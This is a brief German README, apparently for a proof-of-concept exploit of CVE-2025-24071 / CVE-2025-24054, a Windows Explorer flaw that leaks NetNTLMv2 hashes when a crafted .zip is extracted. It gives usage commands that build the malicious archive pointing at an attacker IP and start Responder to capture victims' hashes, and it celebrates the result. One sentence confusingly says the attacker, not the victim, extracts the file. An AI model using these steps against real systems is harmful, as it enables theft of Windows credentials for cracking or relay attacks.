
Ein PoC für CVE-2025-24071 / CVE-2025-24054, eine Windows-Sicherheitslücke, die das Extrahieren von NTLMv2-Hashes ermöglicht.
Diese Windows-Sicherheitslücke, speziell in 'explorer.exe', ermöglicht es uns, einen NetNTLMv2-Hash von einem Opfer zu erhalten, indem der Angreifer einfach eine .zip-Datei extrahiert.
python PoC.py test 192.168.1.45

sudo python3 responder.py -I ens33

.zip extrahiert, Boom! erhalten wir die NTLM-Hashes